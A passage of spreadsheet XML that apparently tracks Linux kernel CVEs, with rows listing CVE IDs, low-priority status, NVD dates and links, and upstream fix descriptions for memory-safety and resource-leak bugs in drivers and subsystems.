      </c>
      <c r="P811" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q811" s="5" t="inlineStr"/>
      <c r="R811" s="5" t="inlineStr"/>
      <c r="S811" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pinctrl: mediatek: use devm_gpiochip_add_data() for GPIO chip
The gpio_chip is allocated with device-managed memory but registered with
the non-managed gpiochip_add_data(). This was harmless while the drivers
were built-in, but once they can be built as modules and unbound/rmmod'd,
devm frees the gpio_chip's memory while it is still registered, causing a
use-after-free.
Register it with devm_gpiochip_add_data() so it shares the same
device-managed lifecycle, which also lets the manual gpiochip_remove()
error paths go away.</t>
        </is>
      </c>
      <c r="T811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92482</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92483</t>
        </is>
      </c>
      <c r="D812" s="5" t="inlineStr"/>
      <c r="E812" s="5" t="inlineStr"/>
      <c r="F812" s="5" t="inlineStr"/>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="inlineStr"/>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr"/>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q812" s="5" t="inlineStr"/>
      <c r="R812" s="5" t="inlineStr"/>
      <c r="S812" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
liveupdate: Remember FLB retrieve() status
LUO keeps track of successful retrieve attempts on an FLB. It does so
to avoid multiple retrievals of the same FLB. Multiple retrievals cause
problems because once the FLB is retrieved, the serialized data
structures are likely freed and the FLB is likely in a very different
state from what the code expects.
All this works well when retrieve succeeds. When it fails,
luo_flb_retrieve_one() returns the error immediately, without ever
storing anywhere that a retrieve was attempted or what its error code
was. If the user attempts to retrieve another file registered with the
same FLB, LUO will attempt to call the FLB's retrieve() callback again.
The retry is problematic for much of the same reasons listed above. The
FLB is likely in a very different state than what the retrieve logic
normally expects (e.g. some KHO pages may have already been restored and
freed).
There is no sane way of attempting the retrieve again. Remember the
error retrieve returned and directly return it on a retry.
This is done by changing the retrieved bool to a retrieve_status
integer. A value of 0 means retrieve was never attempted, a positive
value means it succeeded, and a negative value means it failed and the
error code is the value.
This is similar to commit f85b1c6af5bc ("liveupdate: luo_file: remember
retrieve() status") which did the same for LUO files.</t>
        </is>
      </c>
      <c r="T812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92483</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92484</t>
        </is>
      </c>
      <c r="D813" s="5" t="inlineStr"/>
      <c r="E813" s="5" t="inlineStr"/>
      <c r="F813" s="5" t="inlineStr"/>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="inlineStr"/>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q813" s="5" t="inlineStr"/>
      <c r="R813" s="5" t="inlineStr"/>
      <c r="S813" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/region: Fix use-after-free in find_pos_and_ways() error path
The error path releases its reference to a switch decoder before
logging an error that includes the decoder name. If the released
reference is the last one, the decoder can be freed before the error
message accesses its name.
Drop the reference after the error is reported.</t>
        </is>
      </c>
      <c r="T813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92484</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92485</t>
        </is>
      </c>
      <c r="D814" s="5" t="inlineStr"/>
      <c r="E814" s="5" t="inlineStr"/>
      <c r="F814" s="5" t="inlineStr"/>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="inlineStr"/>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q814" s="5" t="inlineStr"/>
      <c r="R814" s="5" t="inlineStr"/>
      <c r="S814" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix WARNING in bpf_tracing_link_release
The trampoline could be corrupted by the blindly
'tr-&gt;flags = BPF_TRAMP_F_TAIL_CALL_CTX' in verifier.
1. A fexit attached to a tail_call_reachable prog. 'tr-&gt;flags' became
   'BPF_TRAMP_F_CALL_ORIG | BPF_TRAMP_F_TAIL_CALL_CTX'. And, the
   trampoline would poke the target prog's nop insn using jmp insn instead
   of call insn.
2. Another fexit loaded with the same tail_call_reachable prog target.
   'tr-&gt;flags' became 'BPF_TRAMP_F_TAIL_CALL_CTX'.
3. Close the first fexit link. Due to no BPF_TRAMP_F_CALL_ORIG in
   'tr-&gt;flags', the trampoline will fail to restore the prog's nop insn
   using call insn.
[    3.410719] WARNING: kernel/bpf/syscall.c:3551 at bpf_tracing_link_release+0x53/0x60, CPU#1: test_progs/98
...
[    3.428793]  bpf_link_free+0x58/0x130
[    3.429293]  bpf_link_release+0x23/0x30
Fix the warning by updating 'tr-&gt;flags' with '|=' and lock.</t>
        </is>
      </c>
      <c r="T814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92485</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92486</t>
        </is>
      </c>
      <c r="D815" s="5" t="inlineStr"/>
      <c r="E815" s="5" t="inlineStr"/>
      <c r="F815" s="5" t="inlineStr"/>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="inlineStr"/>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr"/>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q815" s="5" t="inlineStr"/>
      <c r="R815" s="5" t="inlineStr"/>
      <c r="S815" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix CFI mismatch in task work callback
BPF subprograms use the bpf_callback_t ABI, but task work invokes the
callback through a three-argument function pointer. This trips kCFI.
Store and invoke the callback as bpf_callback_t.</t>
        </is>
      </c>
      <c r="T815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92486</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92487</t>
        </is>
      </c>
      <c r="D816" s="5" t="inlineStr"/>
      <c r="E816" s="5" t="inlineStr"/>
      <c r="F816" s="5" t="inlineStr"/>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="inlineStr"/>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr"/>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q816" s="5" t="inlineStr"/>
      <c r="R816" s="5" t="inlineStr"/>
      <c r="S816" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
exfat: fix valid_size extension over a shared writable mapping
When a shared writable mapping has its valid_size extended by a buffered
write or a page fault, exfat zeroes the page-cache gap below the new
valid_size. A store through the mapping can race with this zeroing and be
overwritten.
Fix this by zeroing the gap lazily. Drop -&gt;map_pages so that every first
write fault goes through exfat_page_mkwrite(), which advances valid_size to
cover the faulting page. With fault-around enabled, a store could install a
writable PTE, skip -&gt;page_mkwrite(), and land past valid_size without
advancing it. Extending valid_size one faulting page at a time also leaves
never-written pages in a large mapping alone.
The gap is filled with block granularity, zeroing only the not-uptodate
blocks and preserving blocks that may hold data stored through the mapping.
On the buffered-write path the invalidate lock is held and the gap is
unmapped before zeroing, so a racing store re-faults and, under the inode
lock, completes only after the gap has been zeroed and valid_size covers
it.</t>
        </is>
      </c>
      <c r="T816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92487</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92488</t>
        </is>
      </c>
      <c r="D817" s="5" t="inlineStr"/>
      <c r="E817" s="5" t="inlineStr"/>
      <c r="F817" s="5" t="inlineStr"/>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="inlineStr"/>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr"/>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q817" s="5" t="inlineStr"/>
      <c r="R817" s="5" t="inlineStr"/>
      <c r="S817" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: complete object teardown when the destroy command fails
erdma_destroy_qp(), erdma_destroy_cq(), erdma_dereg_mr(), and
erdma_destroy_ah() returned early when erdma_post_cmd_wait() failed,
leaking the queue buffers, MTTs, doorbells and the STAG, QPN, CQN and AHN
identifiers. A command timeout clears ERDMA_CMDQ_STATE_OK_BIT and
permanently disables the command queue, so no retry can succeed; the RDMA
core keeps the object after a failed destructor and forced uverbs cleanup
then nulls the pointers, making the resources unreachable.
Warn on failure but release every software-owned resource and return
success, since during terminal destruction the hardware command result is
only diagnostic.</t>
        </is>
      </c>
      <c r="T817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92488</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92489</t>
        </is>
      </c>
      <c r="D818" s="5" t="inlineStr"/>
      <c r="E818" s="5" t="inlineStr"/>
      <c r="F818" s="5" t="inlineStr"/>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="inlineStr"/>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr"/>
      <c r="L818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q818" s="5" t="inlineStr"/>
      <c r="R818" s="5" t="inlineStr"/>
      <c r="S818" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfrm: Fix skb double-free in xfrm_dev_direct_output()
A return value other than 1 from local_out() means that the skb has been
consumed or its ownership was transferred. xfrm_dev_direct_output()
nevertheless frees the skb on this path, causing a double-free when
netfilter drops the packet and invalidating any other owner.
Return the local_out() result directly, matching the ownership handling
in xfrm_output_resume().</t>
        </is>
      </c>
      <c r="T818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92489</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92490</t>
        </is>
      </c>
      <c r="D819" s="5" t="inlineStr"/>
      <c r="E819" s="5" t="inlineStr"/>
      <c r="F819" s="5" t="inlineStr"/>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="inlineStr"/>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr"/>
      <c r="L819" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q819" s="5" t="inlineStr"/>
      <c r="R819" s="5" t="inlineStr"/>
      <c r="S819" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Unrequest devices if driver registration fails
scmi_driver_register() requests protocol devices before registering the
driver. If driver_register() fails, those requests remain in the global
IDR and retain pointers to the module's ID table. Once the failed module
load releases that storage, later request matching or SCMI device creation
can dereference the stale pointers.
Unrequest the complete protocol table before returning the registration
failure. At this point table registration succeeded, so every entry is
owned by the current registration attempt.</t>
        </is>
      </c>
      <c r="T819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92490</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92491</t>
        </is>
      </c>
      <c r="D820" s="5" t="inlineStr"/>
      <c r="E820" s="5" t="inlineStr"/>
      <c r="F820" s="5" t="inlineStr"/>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="inlineStr"/>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr"/>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q820" s="5" t="inlineStr"/>
      <c r="R820" s="5" t="inlineStr"/>
      <c r="S820" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Roll back partial protocol table registration
scmi_protocol_table_register() can leave earlier requests registered when
a later entry in the same ID table fails. Each request retains a pointer
to the driver's ID table, so a failed module load can leave a dangling
pointer after the module storage is released.
Unrequest only the successfully registered prefix, in reverse order,
before returning the failure. Leave the failed entry and the remaining
entries untouched because matching requests can be owned by another
driver.</t>
        </is>
      </c>
      <c r="T820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92491</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92492</t>
        </is>
      </c>
      <c r="D821" s="5" t="inlineStr"/>
      <c r="E821" s="5" t="inlineStr"/>
      <c r="F821" s="5" t="inlineStr"/>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="inlineStr"/>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr"/>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q821" s="5" t="inlineStr"/>
      <c r="R821" s="5" t="inlineStr"/>
      <c r="S821" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq/amd-pstate: handle missing policy in dynamic EPP callbacks
cpufreq_cpu_get() returns NULL when no cpufreq policy is associated with
the requested CPU, for example because the CPU is offline or the policy
has already been torn down.  Both amd_pstate_power_supply_notifier() and
amd_pstate_profile_set() acquire a policy via cpufreq_cpu_get() and then
pass that pointer to amd_pstate_get_balanced_epp() and
amd_pstate_set_epp(), which dereference it unconditionally.  A racing
CPU hotplug or driver teardown can therefore lead to a NULL pointer
dereference on either of these dynamic EPP paths.
The third cpufreq_cpu_get() caller in this file, amd_pstate_verify(),
already handles the NULL case.  Bring the two new callers in line with
that pattern: return NOTIFY_OK from the power-supply notifier (matching
the other "nothing to do" exits) and -ENODEV from amd_pstate_profile_set()
(the usual cpufreq error for a missing CPU policy).
Found by code inspection; not tested on hardware.</t>
        </is>
      </c>
      <c r="T821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92492</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92493</t>
        </is>
      </c>
      <c r="D822" s="5" t="inlineStr"/>
      <c r="E822" s="5" t="inlineStr"/>
      <c r="F822" s="5" t="inlineStr"/>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="inlineStr"/>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr"/>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q822" s="5" t="inlineStr"/>
      <c r="R822" s="5" t="inlineStr"/>
      <c r="S822" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: amd-pstate-ut: Skip tests when amd-pstate driver is not active
The crash issue may occur when modprobe amd_pstate_ut on intel platform.
   amd_pstate_ut: 1    amd_pstate_ut_acpi_cpc_valid  success!
   amd_pstate_ut: 2    amd_pstate_ut_check_enabled   success!
   BUG: kernel NULL pointer dereference, address: 0000000000000080
   #PF: supervisor read access in kernel mode
   #PF: error_code(0x0000) - not-present page
   PGD 0 P4D 0
   Oops: 0000 [#1] SMP NOPTI
   CPU: 0 PID: 20300 Comm: modprobe
   Kdump: loaded Tainted: G O 6.6.0-0010.rc1.ctl4.x86_64 #1
   Hardware name: FiberHome R2200 V5/Xeon Boards, BIOS 3.1a 02/24/2020
   RIP: 0010:amd_pstate_ut_check_perf+0x141/0x280 [amd_pstate_ut]
   Call Trace:
    &lt;TASK&gt;
    amd_pstate_ut_init+0x1b/0xff0 [amd_pstate_ut]
    ? __pfx_amd_pstate_ut_init+0x10/0x10 [amd_pstate_ut]
    do_one_initcall+0x42/0x2e0
    ? kmalloc_trace+0x26/0x90
    do_init_module+0x60/0x240
    __se_sys_init_module+0x185/0x1c0
    do_syscall_64+0x62/0x190
    entry_SYSCALL_64_after_hwframe+0x76/0x7e
    &lt;/TASK&gt;
Add state detection to amd pstate driver to prevent amd_pstate_ut driver
from testing on non-AMD platforms.
(ML: adjust title)</t>
        </is>
      </c>
      <c r="T822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92493</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92494</t>
        </is>
      </c>
      <c r="D823" s="5" t="inlineStr"/>
      <c r="E823" s="5" t="inlineStr"/>
      <c r="F823" s="5" t="inlineStr"/>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="inlineStr"/>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q823" s="5" t="inlineStr"/>
      <c r="R823" s="5" t="inlineStr"/>
      <c r="S823" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: fix buffer_head leak in ext4_init_orphan_info
ext4_init_orphan_info() reads orphan file blocks with ext4_bread()
and stores the returned buffer_head in oi-&gt;of_binfo[i].ob_bh.
If ext4_bread() succeeds but the orphan block magic or checksum
validation fails, the function jumps to out_free. However, the old
out_free loop starts releasing buffers from i - 1, so the current
buffer_head at index i is skipped.
This leaks the buffer_head reference obtained by ext4_bread() on the
bad magic and bad checksum error paths.
Fix this by tracking the number of successfully read buffer_heads and
releasing exactly those buffer_heads on the error path.</t>
        </is>
      </c>
      <c r="T823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92494</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92495</t>
        </is>
      </c>
      <c r="D824" s="5" t="inlineStr"/>
      <c r="E824" s="5" t="inlineStr"/>
      <c r="F824" s="5" t="inlineStr"/>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="inlineStr"/>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr"/>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q824" s="5" t="inlineStr"/>
      <c r="R824" s="5" t="inlineStr"/>
      <c r="S824" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/bnxt_re: Clear VM_MAYWRITE on DBR/toggle page mmap
bnxt_re_mmap() rejects VM_WRITE for the DBR_PAGE and TOGGLE_PAGE mmap
flags, but a read-only mapping can still retain VM_MAYWRITE. nd later
be upgraded with mprotect(PROT_WRITE). This can bypass the write check
that only runs at mmap time.
Clear VM_MAYWRITE before vm_insert_page() in the shared DBR/toggle-page
branch, matching the existing policy that userspace writes are not
expected for these pages.</t>
        </is>
      </c>
      <c r="T824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92495</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92496</t>
        </is>
      </c>
      <c r="D825" s="5" t="inlineStr"/>
      <c r="E825" s="5" t="inlineStr"/>
      <c r="F825" s="5" t="inlineStr"/>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="inlineStr"/>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr"/>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q825" s="5" t="inlineStr"/>
      <c r="R825" s="5" t="inlineStr"/>
      <c r="S825" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: Avoid buffer overread in ath11k_wmi_tlv_op_rx()
Currently, in ath11k_wmi_tlv_op_rx(), the firmware buffer is read
without first verifying that the buffer has enough data to hold a
header. This could result in a buffer overread.
Add an upfront length check before dereferencing skb-&gt;data as a
wmi_cmd_hdr. The check is placed before the trace_ath11k_wmi_event()
call to preserve the existing trace semantics (tracing the full raw
WMI event including the header), unlike the analogous ath12k fix which
could use skb_pull_data() directly.
Compile tested only.</t>
        </is>
      </c>
      <c r="T825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92496</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92497</t>
        </is>
      </c>
      <c r="D826" s="5" t="inlineStr"/>
      <c r="E826" s="5" t="inlineStr"/>
      <c r="F826" s="5" t="inlineStr"/>
      <c r="G826" s="5" t="inlineStr"/>
